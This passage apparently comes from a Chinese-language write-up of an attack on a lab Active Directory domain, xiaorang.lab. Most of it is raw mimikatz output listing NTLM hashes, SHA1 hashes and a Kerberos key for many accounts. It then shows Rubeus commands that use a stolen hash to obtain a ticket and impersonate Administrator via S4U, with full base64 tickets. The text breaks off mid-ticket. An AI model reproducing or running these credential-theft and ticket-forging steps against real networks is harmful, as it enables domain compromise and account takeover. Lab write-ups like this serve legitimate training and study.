kerberos :
* Username : MSSQLSERVER17
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 202435 (00000000:000316c3)
Session : Interactive from 0
User Name : MSSQLSERVER16
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2023/12/1 16:37:57
SID : S-1-5-21-1403470932-1755135066-2609122076-1019
msv :
[00000003] Primary
* Username : MSSQLSERVER16
* Domain : MSSQLSERVER
* NTLM : 42c0eed1872923f6b60118d9711282a6
* SHA1 : dcf14b63c01e9d5a9d4d9c25d1b2eb6c65c2e3a6
tspkg :
wdigest :
* Username : MSSQLSERVER16
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER16
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 202271 (00000000:0003161f)
Session : Interactive from 0
User Name : MSSQLSERVER14
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2023/12/1 16:37:57
SID : S-1-5-21-1403470932-1755135066-2609122076-1017
msv :
[00000003] Primary
* Username : MSSQLSERVER14
* Domain : MSSQLSERVER
* NTLM : 7c8553b614055d945f8b8c3cf8eae789
* SHA1 : 1efdc2efed20ca503bdefea5aef8aa0ea04c257b
tspkg :
wdigest :
* Username : MSSQLSERVER14
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER14
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 202098 (00000000:00031572)
Session : Interactive from 0
User Name : MSSQLSERVER12
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2023/12/1 16:37:57
SID : S-1-5-21-1403470932-1755135066-2609122076-1015
msv :
[00000003] Primary
* Username : MSSQLSERVER12
* Domain : MSSQLSERVER
* NTLM : 672702a4bd7524269b77dbb6b2e75911
* SHA1 : c7a828609e4912ab752b43deda8351dc1a8ea240
tspkg :
wdigest :
* Username : MSSQLSERVER12
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER12
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 201903 (00000000:000314af)
Session : Interactive from 0
User Name : MSSQLSERVER10
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2023/12/1 16:37:57
SID : S-1-5-21-1403470932-1755135066-2609122076-1013
msv :
[00000003] Primary
* Username : MSSQLSERVER10
* Domain : MSSQLSERVER
* NTLM : c3e7aa593081ae1b210547da7d46819b
* SHA1 : 3bf20cfece021438cf86617f5cabc5e7a69038f7
tspkg :
wdigest :
* Username : MSSQLSERVER10
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER10
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 201548 (00000000:0003134c)
Session : Interactive from 0
User Name : MSSQLSERVER06
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2023/12/1 16:37:57
SID : S-1-5-21-1403470932-1755135066-2609122076-1009
msv :
[00000003] Primary
* Username : MSSQLSERVER06
* Domain : MSSQLSERVER
* NTLM : aa206c617e2194dd76b766b7e3c92bc6
* SHA1 : 62dd8046a71c17fe7263bab86b1ca4506f8c373c
tspkg :
wdigest :
* Username : MSSQLSERVER06
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER06
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 201467 (00000000:000312fb)
Session : Interactive from 0
User Name : MSSQLSERVER05
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2023/12/1 16:37:57
SID : S-1-5-21-1403470932-1755135066-2609122076-1008
msv :
[00000003] Primary
* Username : MSSQLSERVER05
* Domain : MSSQLSERVER
* NTLM : b552da4a7f732c40ca73c01dfaea7ebc
* SHA1 : 7f041a31e763eed45fb881c7f77831b888c3051d
tspkg :
wdigest :
* Username : MSSQLSERVER05
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER05
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 201305 (00000000:00031259)
Session : Interactive from 0
User Name : MSSQLSERVER03
Domain : MSSQLSERVER
Logon Server : MSSQLSERVER
Logon Time : 2023/12/1 16:37:57
SID : S-1-5-21-1403470932-1755135066-2609122076-1006
msv :
[00000003] Primary
* Username : MSSQLSERVER03
* Domain : MSSQLSERVER
* NTLM : 2f7c88f56a7236f476d18ea6b5a2d33a
* SHA1 : 5bc2d09b8b0f7c11a1fc3fb2f97b713ac116b6eb
tspkg :
wdigest :
* Username : MSSQLSERVER03
* Domain : MSSQLSERVER
* Password : (null)
kerberos :
* Username : MSSQLSERVER03
* Domain : MSSQLSERVER
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 179912 (00000000:0002bec8)
Session : Service from 0
User Name : MSSQLLaunchpad
Domain : NT Service
Logon Server : (null)
Logon Time : 2023/12/1 16:37:54
SID : S-1-5-80-3477044410-376262199-2110164357-2030828471-4165405235
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : 97df6540a2262b8482511080b95169c8
* SHA1 : 9fd0e61b22f72ef2baab1327b716f67c629be979
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : MSSQLSERVER$
* Domain : xiaorang.lab
* Password : f7 2e f2 90 b2 0d 57 28 c1 ba 33 c9 34 4b 96 e0 a7 76 da 98 43 0d b7 93 0e d1 8c 6b 92 d0 34 79 8a 9e 8a 16 42 cc 89 fa 57 83 ca 53 e8 26 30 73 29 0d a2 a2 58 dd d2 35 29 6d 9b d6 28 79 d4 2a 1e c9 85 47 99 a4 3b 88 8b 10 03 88 f2 66 c9 44 f2 59 98 47 e5 a0 d2 cd 17 f8 45 d3 99 73 6b 16 10 a6 52 7d b1 71 fd 60 82 f0 10 af 30 93 1d 29 1e 87 a4 41 7a 26 1e 49 aa f2 bd 27 20 69 2b 5c a5 0a bd cc 61 f7 31 7a 3b 42 a5 38 df 70 8f 5f fa 8d 24 a0 04 ae 64 8b ed b4 b2 aa 80 1a 01 a6 a8 e9 5e f4 65 22 70 86 4f eb 75 3c 97 67 53 77 21 93 49 3f e3 5d ce 4a 5c 91 08 e8 3c 0a d4 c0 f4 6a 56 f6 1f cb 7c 55 39 55 94 66 07 50 25 8c 37 83 4f a3 59 79 14 75 91 8b ae 3a 9f 44 54 11 0d 2d 2b 35 46 78 a1 85 93 61 d5 3f c1 eb 36 2c
ssp :
credman :

Authentication Id : 0 ; 178360 (00000000:0002b8b8)
Session : Service from 0
User Name : MSSQLFDLauncher
Domain : NT Service
Logon Server : (null)
Logon Time : 2023/12/1 16:37:54
SID : S-1-5-80-3263513310-3392720605-1798839546-683002060-3227631582
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : 97df6540a2262b8482511080b95169c8
* SHA1 : 9fd0e61b22f72ef2baab1327b716f67c629be979
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : MSSQLSERVER$
* Domain : xiaorang.lab
* Password : f7 2e f2 90 b2 0d 57 28 c1 ba 33 c9 34 4b 96 e0 a7 76 da 98 43 0d b7 93 0e d1 8c 6b 92 d0 34 79 8a 9e 8a 16 42 cc 89 fa 57 83 ca 53 e8 26 30 73 29 0d a2 a2 58 dd d2 35 29 6d 9b d6 28 79 d4 2a 1e c9 85 47 99 a4 3b 88 8b 10 03 88 f2 66 c9 44 f2 59 98 47 e5 a0 d2 cd 17 f8 45 d3 99 73 6b 16 10 a6 52 7d b1 71 fd 60 82 f0 10 af 30 93 1d 29 1e 87 a4 41 7a 26 1e 49 aa f2 bd 27 20 69 2b 5c a5 0a bd cc 61 f7 31 7a 3b 42 a5 38 df 70 8f 5f fa 8d 24 a0 04 ae 64 8b ed b4 b2 aa 80 1a 01 a6 a8 e9 5e f4 65 22 70 86 4f eb 75 3c 97 67 53 77 21 93 49 3f e3 5d ce 4a 5c 91 08 e8 3c 0a d4 c0 f4 6a 56 f6 1f cb 7c 55 39 55 94 66 07 50 25 8c 37 83 4f a3 59 79 14 75 91 8b ae 3a 9f 44 54 11 0d 2d 2b 35 46 78 a1 85 93 61 d5 3f c1 eb 36 2c
ssp :
credman :

Authentication Id : 0 ; 95178 (00000000:000173ca)
Session : Service from 0
User Name : SSISTELEMETRY130
Domain : NT Service
Logon Server : (null)
Logon Time : 2023/12/1 16:37:45
SID : S-1-5-80-1625532266-625503396-2441596095-4129757946-3375356652
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : 97df6540a2262b8482511080b95169c8
* SHA1 : 9fd0e61b22f72ef2baab1327b716f67c629be979
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : MSSQLSERVER$
* Domain : xiaorang.lab
* Password : f7 2e f2 90 b2 0d 57 28 c1 ba 33 c9 34 4b 96 e0 a7 76 da 98 43 0d b7 93 0e d1 8c 6b 92 d0 34 79 8a 9e 8a 16 42 cc 89 fa 57 83 ca 53 e8 26 30 73 29 0d a2 a2 58 dd d2 35 29 6d 9b d6 28 79 d4 2a 1e c9 85 47 99 a4 3b 88 8b 10 03 88 f2 66 c9 44 f2 59 98 47 e5 a0 d2 cd 17 f8 45 d3 99 73 6b 16 10 a6 52 7d b1 71 fd 60 82 f0 10 af 30 93 1d 29 1e 87 a4 41 7a 26 1e 49 aa f2 bd 27 20 69 2b 5c a5 0a bd cc 61 f7 31 7a 3b 42 a5 38 df 70 8f 5f fa 8d 24 a0 04 ae 64 8b ed b4 b2 aa 80 1a 01 a6 a8 e9 5e f4 65 22 70 86 4f eb 75 3c 97 67 53 77 21 93 49 3f e3 5d ce 4a 5c 91 08 e8 3c 0a d4 c0 f4 6a 56 f6 1f cb 7c 55 39 55 94 66 07 50 25 8c 37 83 4f a3 59 79 14 75 91 8b ae 3a 9f 44 54 11 0d 2d 2b 35 46 78 a1 85 93 61 d5 3f c1 eb 36 2c
ssp :
credman :

Authentication Id : 0 ; 93622 (00000000:00016db6)
Session : Service from 0
User Name : ReportServer
Domain : NT Service
Logon Server : (null)
Logon Time : 2023/12/1 16:37:45
SID : S-1-5-80-2885764129-887777008-271615777-1616004480-2722851051
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : 97df6540a2262b8482511080b95169c8
* SHA1 : 9fd0e61b22f72ef2baab1327b716f67c629be979
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : MSSQLSERVER$
* Domain : xiaorang.lab
* Password : f7 2e f2 90 b2 0d 57 28 c1 ba 33 c9 34 4b 96 e0 a7 76 da 98 43 0d b7 93 0e d1 8c 6b 92 d0 34 79 8a 9e 8a 16 42 cc 89 fa 57 83 ca 53 e8 26 30 73 29 0d a2 a2 58 dd d2 35 29 6d 9b d6 28 79 d4 2a 1e c9 85 47 99 a4 3b 88 8b 10 03 88 f2 66 c9 44 f2 59 98 47 e5 a0 d2 cd 17 f8 45 d3 99 73 6b 16 10 a6 52 7d b1 71 fd 60 82 f0 10 af 30 93 1d 29 1e 87 a4 41 7a 26 1e 49 aa f2 bd 27 20 69 2b 5c a5 0a bd cc 61 f7 31 7a 3b 42 a5 38 df 70 8f 5f fa 8d 24 a0 04 ae 64 8b ed b4 b2 aa 80 1a 01 a6 a8 e9 5e f4 65 22 70 86 4f eb 75 3c 97 67 53 77 21 93 49 3f e3 5d ce 4a 5c 91 08 e8 3c 0a d4 c0 f4 6a 56 f6 1f cb 7c 55 39 55 94 66 07 50 25 8c 37 83 4f a3 59 79 14 75 91 8b ae 3a 9f 44 54 11 0d 2d 2b 35 46 78 a1 85 93 61 d5 3f c1 eb 36 2c
ssp :
credman :

Authentication Id : 0 ; 93476 (00000000:00016d24)
Session : Service from 0
User Name : MSSQLSERVER
Domain : NT Service
Logon Server : (null)
Logon Time : 2023/12/1 16:37:45
SID : S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : 97df6540a2262b8482511080b95169c8
* SHA1 : 9fd0e61b22f72ef2baab1327b716f67c629be979
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : MSSQLSERVER$
* Domain : xiaorang.lab
* Password : f7 2e f2 90 b2 0d 57 28 c1 ba 33 c9 34 4b 96 e0 a7 76 da 98 43 0d b7 93 0e d1 8c 6b 92 d0 34 79 8a 9e 8a 16 42 cc 89 fa 57 83 ca 53 e8 26 30 73 29 0d a2 a2 58 dd d2 35 29 6d 9b d6 28 79 d4 2a 1e c9 85 47 99 a4 3b 88 8b 10 03 88 f2 66 c9 44 f2 59 98 47 e5 a0 d2 cd 17 f8 45 d3 99 73 6b 16 10 a6 52 7d b1 71 fd 60 82 f0 10 af 30 93 1d 29 1e 87 a4 41 7a 26 1e 49 aa f2 bd 27 20 69 2b 5c a5 0a bd cc 61 f7 31 7a 3b 42 a5 38 df 70 8f 5f fa 8d 24 a0 04 ae 64 8b ed b4 b2 aa 80 1a 01 a6 a8 e9 5e f4 65 22 70 86 4f eb 75 3c 97 67 53 77 21 93 49 3f e3 5d ce 4a 5c 91 08 e8 3c 0a d4 c0 f4 6a 56 f6 1f cb 7c 55 39 55 94 66 07 50 25 8c 37 83 4f a3 59 79 14 75 91 8b ae 3a 9f 44 54 11 0d 2d 2b 35 46 78 a1 85 93 61 d5 3f c1 eb 36 2c
ssp :
credman :

Authentication Id : 0 ; 93440 (00000000:00016d00)
Session : Service from 0
User Name : MSSQLServerOLAPService
Domain : NT Service
Logon Server : (null)
Logon Time : 2023/12/1 16:37:45
SID : S-1-5-80-2872255330-672591203-888807865-2791174282-1554802921
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : 97df6540a2262b8482511080b95169c8
* SHA1 : 9fd0e61b22f72ef2baab1327b716f67c629be979
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : MSSQLSERVER$
* Domain : xiaorang.lab
* Password : f7 2e f2 90 b2 0d 57 28 c1 ba 33 c9 34 4b 96 e0 a7 76 da 98 43 0d b7 93 0e d1 8c 6b 92 d0 34 79 8a 9e 8a 16 42 cc 89 fa 57 83 ca 53 e8 26 30 73 29 0d a2 a2 58 dd d2 35 29 6d 9b d6 28 79 d4 2a 1e c9 85 47 99 a4 3b 88 8b 10 03 88 f2 66 c9 44 f2 59 98 47 e5 a0 d2 cd 17 f8 45 d3 99 73 6b 16 10 a6 52 7d b1 71 fd 60 82 f0 10 af 30 93 1d 29 1e 87 a4 41 7a 26 1e 49 aa f2 bd 27 20 69 2b 5c a5 0a bd cc 61 f7 31 7a 3b 42 a5 38 df 70 8f 5f fa 8d 24 a0 04 ae 64 8b ed b4 b2 aa 80 1a 01 a6 a8 e9 5e f4 65 22 70 86 4f eb 75 3c 97 67 53 77 21 93 49 3f e3 5d ce 4a 5c 91 08 e8 3c 0a d4 c0 f4 6a 56 f6 1f cb 7c 55 39 55 94 66 07 50 25 8c 37 83 4f a3 59 79 14 75 91 8b ae 3a 9f 44 54 11 0d 2d 2b 35 46 78 a1 85 93 61 d5 3f c1 eb 36 2c
ssp :
credman :

Authentication Id : 0 ; 92650 (00000000:000169ea)
Session : Service from 0
User Name : MsDtsServer130
Domain : NT Service
Logon Server : (null)
Logon Time : 2023/12/1 16:37:44
SID : S-1-5-80-3763098489-2620711134-3767674660-4164406483-1621732
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : 97df6540a2262b8482511080b95169c8
* SHA1 : 9fd0e61b22f72ef2baab1327b716f67c629be979
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : MSSQLSERVER$
* Domain : xiaorang.lab
* Password : f7 2e f2 90 b2 0d 57 28 c1 ba 33 c9 34 4b 96 e0 a7 76 da 98 43 0d b7 93 0e d1 8c 6b 92 d0 34 79 8a 9e 8a 16 42 cc 89 fa 57 83 ca 53 e8 26 30 73 29 0d a2 a2 58 dd d2 35 29 6d 9b d6 28 79 d4 2a 1e c9 85 47 99 a4 3b 88 8b 10 03 88 f2 66 c9 44 f2 59 98 47 e5 a0 d2 cd 17 f8 45 d3 99 73 6b 16 10 a6 52 7d b1 71 fd 60 82 f0 10 af 30 93 1d 29 1e 87 a4 41 7a 26 1e 49 aa f2 bd 27 20 69 2b 5c a5 0a bd cc 61 f7 31 7a 3b 42 a5 38 df 70 8f 5f fa 8d 24 a0 04 ae 64 8b ed b4 b2 aa 80 1a 01 a6 a8 e9 5e f4 65 22 70 86 4f eb 75 3c 97 67 53 77 21 93 49 3f e3 5d ce 4a 5c 91 08 e8 3c 0a d4 c0 f4 6a 56 f6 1f cb 7c 55 39 55 94 66 07 50 25 8c 37 83 4f a3 59 79 14 75 91 8b ae 3a 9f 44 54 11 0d 2d 2b 35 46 78 a1 85 93 61 d5 3f c1 eb 36 2c
ssp :
credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2023/12/1 16:37:43
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 62379 (00000000:0000f3ab)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/12/1 16:37:43
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : 97df6540a2262b8482511080b95169c8
* SHA1 : 9fd0e61b22f72ef2baab1327b716f67c629be979
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : MSSQLSERVER$
* Domain : xiaorang.lab
* Password : f7 2e f2 90 b2 0d 57 28 c1 ba 33 c9 34 4b 96 e0 a7 76 da 98 43 0d b7 93 0e d1 8c 6b 92 d0 34 79 8a 9e 8a 16 42 cc 89 fa 57 83 ca 53 e8 26 30 73 29 0d a2 a2 58 dd d2 35 29 6d 9b d6 28 79 d4 2a 1e c9 85 47 99 a4 3b 88 8b 10 03 88 f2 66 c9 44 f2 59 98 47 e5 a0 d2 cd 17 f8 45 d3 99 73 6b 16 10 a6 52 7d b1 71 fd 60 82 f0 10 af 30 93 1d 29 1e 87 a4 41 7a 26 1e 49 aa f2 bd 27 20 69 2b 5c a5 0a bd cc 61 f7 31 7a 3b 42 a5 38 df 70 8f 5f fa 8d 24 a0 04 ae 64 8b ed b4 b2 aa 80 1a 01 a6 a8 e9 5e f4 65 22 70 86 4f eb 75 3c 97 67 53 77 21 93 49 3f e3 5d ce 4a 5c 91 08 e8 3c 0a d4 c0 f4 6a 56 f6 1f cb 7c 55 39 55 94 66 07 50 25 8c 37 83 4f a3 59 79 14 75 91 8b ae 3a 9f 44 54 11 0d 2d 2b 35 46 78 a1 85 93 61 d5 3f c1 eb 36 2c
ssp :
credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : MSSQLSERVER$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2023/12/1 16:37:32
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : MSSQLSERVER$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : mssqlserver$
* Domain : XIAORANG.LAB
* Password : f7 2e f2 90 b2 0d 57 28 c1 ba 33 c9 34 4b 96 e0 a7 76 da 98 43 0d b7 93 0e d1 8c 6b 92 d0 34 79 8a 9e 8a 16 42 cc 89 fa 57 83 ca 53 e8 26 30 73 29 0d a2 a2 58 dd d2 35 29 6d 9b d6 28 79 d4 2a 1e c9 85 47 99 a4 3b 88 8b 10 03 88 f2 66 c9 44 f2 59 98 47 e5 a0 d2 cd 17 f8 45 d3 99 73 6b 16 10 a6 52 7d b1 71 fd 60 82 f0 10 af 30 93 1d 29 1e 87 a4 41 7a 26 1e 49 aa f2 bd 27 20 69 2b 5c a5 0a bd cc 61 f7 31 7a 3b 42 a5 38 df 70 8f 5f fa 8d 24 a0 04 ae 64 8b ed b4 b2 aa 80 1a 01 a6 a8 e9 5e f4 65 22 70 86 4f eb 75 3c 97 67 53 77 21 93 49 3f e3 5d ce 4a 5c 91 08 e8 3c 0a d4 c0 f4 6a 56 f6 1f cb 7c 55 39 55 94 66 07 50 25 8c 37 83 4f a3 59 79 14 75 91 8b ae 3a 9f 44 54 11 0d 2d 2b 35 46 78 a1 85 93 61 d5 3f c1 eb 36 2c
ssp :
credman :

mimikatz #
1
2
3
4
5
6
msv :
[00000003] Primary
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : 97df6540a2262b8482511080b95169c8
* SHA1 : 9fd0e61b22f72ef2baab1327b716f67c629be979
Rubeus申请访问自身的服务票据
1
Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:97df6540a2262b8482511080b95169c8 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
C:\Users\jerem1ah\Desktop>Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:97df6540a2262b8482511080b95169c8 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.0

[*] Action: Ask TGT

[*] Using rc4_hmac hash: 97df6540a2262b8482511080b95169c8
[*] Building AS-REQ (w/ preauth) for: 'xiaorang.lab\MSSQLSERVER$'
[*] Using domain controller: 172.22.2.3:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE3/H+sjb8wrOjmA7MwgAWhzuXgbzwcdEVuPPx699IqXQk5/go33MTZTD4wcHptgPXOWldQ3VDLBNCzlFkIbUOgNdL4i43Wx5tnpFek764ostGPycCTUeo5BLB5DYId47iMwbXaRhQHcDscixGzb8+jkwrtj0SqtDNUBs07c5HwN0D79KTiMhlp2vnVTQ1RiNUhfwagUPGdRBGm5wMUGRg+kjnZA6CvtyPjJVNIFjQ5fWIelw3t2zknmeApNLZF9hMuhjUk5OuxkSbYOLxNBAjLiiAH86jf7I+/eTldVHWl3hL3eunXsYUg5VuWp/P2gr17shejmk1yv+brsF5rxSf2fc/TUvnmaYTsT3m0swq6SHgiNrri90kGrA6l9k004o+8FYhzosuxGWx1DYhVeM9zkrYI4AK7jydor4jvRdbxVbQW4uNS6UvUg+wJuO5lrtKD5RJ4dwYBWRndupxHDmXZjIiANA/En/i96DwfyNWYd/EgqgSc3uzq/DM8pDnFEix0rmbedL41uElqP7qDrZQKtZMMxClwinvbHeskfVNu8nbM3xrUDOYogLZaZCf6nxzlD3vpempkutXl7hc9zrPa41UfrLe81g+OfKVpdolKC1vfO5EVScie/fC1CK7Y1ZaiyVo9q5LU7J7s7VWPEW0J0OAN5afyZCO3F/V23F3quPT2rvjijmwe0aGvV75m+xmNHrEL/h7kYpD4aY8OVWxzxY7EK74BLKxEYD03nSqjxFIFiu4I2eA9m1Ud/x/xf+MHPWGS3HwPiwUR7B+aPvw9keE/7ijC5BnQOXmYgUi6CDCkvZ6AvKE3W33ekIbn7KbVpLnbApD4B1EQlUfpnguCT02wBXGiBHsvsoDgOhn1ebe6HuguGDJX5euHOzCcffCrhspwVCkaYtdBUQ2ScbMtdkBtYymgWfOBbyWgIpcdIjA/gG/WoMCmcWwchK/nasOqQHwEdoItyIs0ThzAtJuiIZGnnYKBtcbmP+6RHdvMEx/5poRMdTvATCS/do3qCdKxVj/Jhzah1z+c7h/RXM08ntXkqmPjDFWws1RxsGdTvQZXWahJuW4eM3YS8KcNU/icUt6nvHg4GhgGg+/a/EHv6zfEKb3wiX1a04njR4t6mWXLXgxjsls7HTG0WeZ61db+myM0uDGSSLlJme4B+eRdu5C2Uvb3ja86xIjrtBOXphpe7YvH1MF+rDh1zqtv9eTmwVB8oaksqgdI6r5DEex/H5JKQRJXnskS2eMsVppmO2EtF5cGReTjJtOxrwdW+SnZykPz1uOR0OVK4O7nxp+JugxkcE7Kzj41dDR5rRxNNC05mHEE2O/TAMIosuok0dfeg+hPLZS7KxJHq1XvV97sqVT5uYimWoyCFORAh9La5DMh4alv5tYHAl3awLCT0X1K/44FL5qG73w07KQyB9TTP4HvAdroyyTtqZvMpxcxEwliStMcBhldo0hOXk1ijgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBAlm+72NS+JgLfI/t46o2+/oQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDIzMTIwMTA5NTI1MVqmERgPMjAyMzEyMDExOTUyNTFapxEYDzIwMjMxMjA4MDk1MjUxWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg==

ServiceName : krbtgt/xiaorang.lab
ServiceRealm : XIAORANG.LAB
UserName : MSSQLSERVER$
UserRealm : XIAORANG.LAB
StartTime : 2023/12/1 17:52:51
EndTime : 2023/12/2 3:52:51
RenewTill : 2023/12/8 17:52:51
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : JZvu9jUviYC3yP7eOqNvvw==
ASREP (key) : 97DF6540A2262B8482511080B95169C8


C:\Users\jerem1ah\Desktop>
抓到后注入票据
1
2
3
4
5
6
./Rubeus.exe -s4u /impersonateuser:Administrator /msdsspn:CIFS/CD.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:服务票据

Rubeus.exe -s4u /impersonateuser:Administrator /msdsspn:CIFS/CD.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE3/H+sjb8wrOjmA7MwgAWhzuXgbzwcdEVuPPx699IqXQk5/go33MTZTD4wcHptgPXOWldQ3VDLBNCzlFkIbUOgNdL4i43Wx5tnpFek764ostGPycCTUeo5BLB5DYId47iMwbXaRhQHcDscixGzb8+jkwrtj0SqtDNUBs07c5HwN0D79KTiMhlp2vnVTQ1RiNUhfwagUPGdRBGm5wMUGRg+kjnZA6CvtyPjJVNIFjQ5fWIelw3t2zknmeApNLZF9hMuhjUk5OuxkSbYOLxNBAjLiiAH86jf7I+/eTldVHWl3hL3eunXsYUg5VuWp/P2gr17shejmk1yv+brsF5rxSf2fc/TUvnmaYTsT3m0swq6SHgiNrri90kGrA6l9k004o+8FYhzosuxGWx1DYhVeM9zkrYI4AK7jydor4jvRdbxVbQW4uNS6UvUg+wJuO5lrtKD5RJ4dwYBWRndupxHDmXZjIiANA/En/i96DwfyNWYd/EgqgSc3uzq/DM8pDnFEix0rmbedL41uElqP7qDrZQKtZMMxClwinvbHeskfVNu8nbM3xrUDOYogLZaZCf6nxzlD3vpempkutXl7hc9zrPa41UfrLe81g+OfKVpdolKC1vfO5EVScie/fC1CK7Y1ZaiyVo9q5LU7J7s7VWPEW0J0OAN5afyZCO3F/V23F3quPT2rvjijmwe0aGvV75m+xmNHrEL/h7kYpD4aY8OVWxzxY7EK74BLKxEYD03nSqjxFIFiu4I2eA9m1Ud/x/xf+MHPWGS3HwPiwUR7B+aPvw9keE/7ijC5BnQOXmYgUi6CDCkvZ6AvKE3W33ekIbn7KbVpLnbApD4B1EQlUfpnguCT02wBXGiBHsvsoDgOhn1ebe6HuguGDJX5euHOzCcffCrhspwVCkaYtdBUQ2ScbMtdkBtYymgWfOBbyWgIpcdIjA/gG/WoMCmcWwchK/nasOqQHwEdoItyIs0ThzAtJuiIZGnnYKBtcbmP+6RHdvMEx/5poRMdTvATCS/do3qCdKxVj/Jhzah1z+c7h/RXM08ntXkqmPjDFWws1RxsGdTvQZXWahJuW4eM3YS8KcNU/icUt6nvHg4GhgGg+/a/EHv6zfEKb3wiX1a04njR4t6mWXLXgxjsls7HTG0WeZ61db+myM0uDGSSLlJme4B+eRdu5C2Uvb3ja86xIjrtBOXphpe7YvH1MF+rDh1zqtv9eTmwVB8oaksqgdI6r5DEex/H5JKQRJXnskS2eMsVppmO2EtF5cGReTjJtOxrwdW+SnZykPz1uOR0OVK4O7nxp+JugxkcE7Kzj41dDR5rRxNNC05mHEE2O/TAMIosuok0dfeg+hPLZS7KxJHq1XvV97sqVT5uYimWoyCFORAh9La5DMh4alv5tYHAl3awLCT0X1K/44FL5qG73w07KQyB9TTP4HvAdroyyTtqZvMpxcxEwliStMcBhldo0hOXk1ijgdowgdegAwIBAKK